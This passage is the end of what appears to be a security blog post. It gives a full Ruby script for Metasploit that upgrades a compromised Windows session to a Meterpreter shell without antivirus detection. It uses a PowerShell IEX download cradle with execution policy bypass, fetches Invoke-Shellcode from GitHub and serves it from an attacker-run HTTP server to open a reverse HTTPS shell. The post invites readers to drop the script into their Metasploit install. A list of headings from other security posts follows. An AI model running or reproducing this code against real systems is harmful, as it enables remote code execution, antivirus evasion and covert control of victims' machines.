Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter >

And just like that, without a peep from MSE, we’ve got a Meterpreter shell.

You can find the code for this implementation below, though be warned; this is PoC quality code, and probably even worse as I’m not really a Ruby developer. Meatballs over at Metasploit has a few awesome Powershell pull requests waiting for a merge. Once this is done, I can implement that here and submit a proper implementation. If you’d like to try this out, simply create a backup copy of scripts/shell/spawn_meterpreter.rb and copy in the following, then reload. You should be upgradin’ and bypassin’ in no time.

#
# Session upgrade using Powershell IEX
# 
# Some code stolen from jduck's original implementation
#
# -drone
#

class HTTPServer
    #
    # Using Ruby HTTPServer here since this isn't a module, and I can't figure
    # out how to use MSF libs in here
    #
    @sent = false
    def state
        return @sent
    end

    def initialize(port, body)
        require 'socket'

        @sent = false
        @server = Thread.new do
            server = TCPServer.open port
            loop do
                client = server.accept
                content_type = "text/plain"
                client.puts "HTTP/1.0 200 OK\r\nContent-type: #{content_type}"\
                            "\r\nContent-Length: #{body.length}\r\n\r\n#{body}"\
                            "\r\n\r\n"
                sleep 5
                client.close
                kill
            end
        end
     end

     def kill!
        @sent = true
        @server.kill
     end

     alias :kill :kill!
end

#
# Returns if a port is used by a session
#
def is_port_used?(port)
    framework.sessions.each do |sid, obj|
       local_info = obj.instance_variable_get(:@local_info)
       return true if local_info =~ /:#{port}$/
    end

    false
end

def start_http_service(port)
    @server = HTTPServer.new(port, @pl)
end

def wait_payload

    waited = 0
    while (not @server.state)
        select(nil, nil, nil, 1)
        waited += 1
        if (waited > 10) # MAGIC NUMBA
            @server.kill
            raise RuntimeError, "No payload requested"
        end
    end
end

def generate(host, port, sport)
    require 'net/http'

    script_block = "iex (New-Object Net.WebClient).DownloadString('http://%s:%s/')" % [host, sport]
    cmd = "cmd.exe /c PowerShell.exe -Exec ByPass -Nol %s" % script_block

    # generate powershell payload
    url = URI.parse('https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1')
    req = Net::HTTP::Get.new(url.path)
    http = Net::HTTP.new(url.host, url.port)
    http.use_ssl = true

    res = http.request(req)

    if !res or res.code != '200'
      raise RuntimeError, "Could not retrieve Invoke-Shellcode"
    end

    @pl = res.body
    @pl << "\nInvoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost %s -Lport %s -Force" % [host, port]
    return cmd
end


#
# Mimics what MSF already does if the user doesn't manually select a payload and lhost
#
lhost = framework.datastore['LHOST']
unless lhost
  lhost = Rex::Socket.source_address
end

#
# If there is no LPORT defined in framework, then pick a random one that's not used
# by current sessions. This is possible if the user assumes module datastore options
# are the same as framework datastore options.
#
lport = framework.datastore['LPORT']
unless lport
  lport = 4444 # Default meterpreter port
  while is_port_used?(lport)
    # Pick a port that's not used
    lport = [*49152..65535].sample
  end
end

# do the same from above, but for the server port
sport = [*49152..65535].sample
while is_port_used?(sport)
    sport = [*49152..65535].sample
end

# maybe we want our sessions going to another instance?
use_handler = true
use_handler = nil if (session.exploit_datastore['DisablePayloadHandler'] == true)

#
# Spawn the handler if needed
#
aborted = false
begin

  mh = nil
  payload_name = 'windows/meterpreter/reverse_https'
  if (use_handler)
      mh = framework.modules.create("exploit/multi/handler")
      mh.datastore['LPORT'] = lport
      mh.datastore['LHOST'] = lhost
      mh.datastore['PAYLOAD'] = payload_name
      mh.datastore['ExitOnSession'] = false
      mh.datastore['EXITFUNC'] = 'process'
      mh.exploit_simple(
        'LocalInput'     => session.user_input,
        'LocalOutput'    => session.user_output,
        'Payload'        => payload_name,
        'RunAsJob'       => true)
      # It takes a little time for the resources to get set up, so sleep for
      # a bit to make sure the exploit is fully working.  Without this,
      # mod.get_resource doesn't exist when we need it.
      select(nil, nil, nil, 0.5)
      if framework.jobs[mh.job_id.to_s].nil?
        raise RuntimeError, "Failed to start multi/handler - is it already running?"
      end
    end

    # Generate our command and payload
    cmd = generate(lhost, lport, sport)

    # start http service
    start_http_service(sport)

    sleep 2 # give it a sec to startup

    # execute command
    session.run_cmd(cmd)

    if not @server.state
        # wait...
        wait_payload
    end

rescue ::Interrupt
  # TODO: cleanup partial uploads!
  aborted = true
rescue => e
  print_error("Error: #{e}")
  aborted = true
end

#
# Stop the job
#
if (use_handler)
  Thread.new do
    if not aborted
      # Wait up to 10 seconds for the session to come in..
      select(nil, nil, nil, 10)
    end
    framework.jobs.stop_job(mh.job_id)
  end
end

Update 09/06/2014

Tom Sellers submitted a PR on 05/29 that implements the above nicely. It appears to support a large swath of platforms, but only a couple support no-disk-write methods, namely the Powershell method.

Normal view

What is an ESP hack?

How can you be affected by this malware?

Main dropper behavior

Stealing social and gaming accounts

Methods to steal account information

Gaming users infected worldwide

Conclusion

Indicators of Compromise

Dropper samples

Payload samples

Domain

Summary

Description

Exploitation

Video PoC Step By Step

Resources

Unpacking Phase

Control Flow Flattening

Overview

Real Destination(s) Recovery

Integrity Check Removal

“Dead” Instructions Removal

A Note On Antidebug Mechanisms

PEB->isBeingDebugged

Debug Interrupts

Rebuilding The Executable

Obfuscator’s Integrity Checking Internals

Deciphering The Data Blobs

Extracting The Offset Ranges

Identifying The Hashing Algorithm

Final Results

Disclaimer

References

Related Content

Introduction

The encryption and key generation algorithms

Decrypting credential files

Defense

Responsible Disclosure

Modus Operandi

Initial Access

Privilege Escalation

Collection & Exfiltration

Mitigations

Conclusion

MITRE ATT&CK mapping

Indicators of Compromise

References

Summary

Impact

Details

Recommendation

Vendor Communication

Acknowledgements

About NCC Group

Overview

CVE-2021-39863

Code Analysis

Exploitation

Preparing the Heap Layout

Triggering the Vulnerability

Obtaining an Arbitrary Read / Write Primitive

Spraying ArrayBuffer Objects

Hijacking the Execution Flow and Executing Arbitrary Code

Conclusion

WAVLINK AC1200

The Magical Setup Wizard

Command Execution as a Service

Cudy and Tenda

The Tenda AC6v2

The Cudy WR1300

Firmware Downgrades For Fun and Profit

Final Thoughts

syscalling

syscall values are not consistent

syscall’s miss useful/critical functionality

the spooky functions are probably being called anyway

syscall’s are partially effective at escaping UM data sinks

your testing isn’t comprehensive or indicative of the general case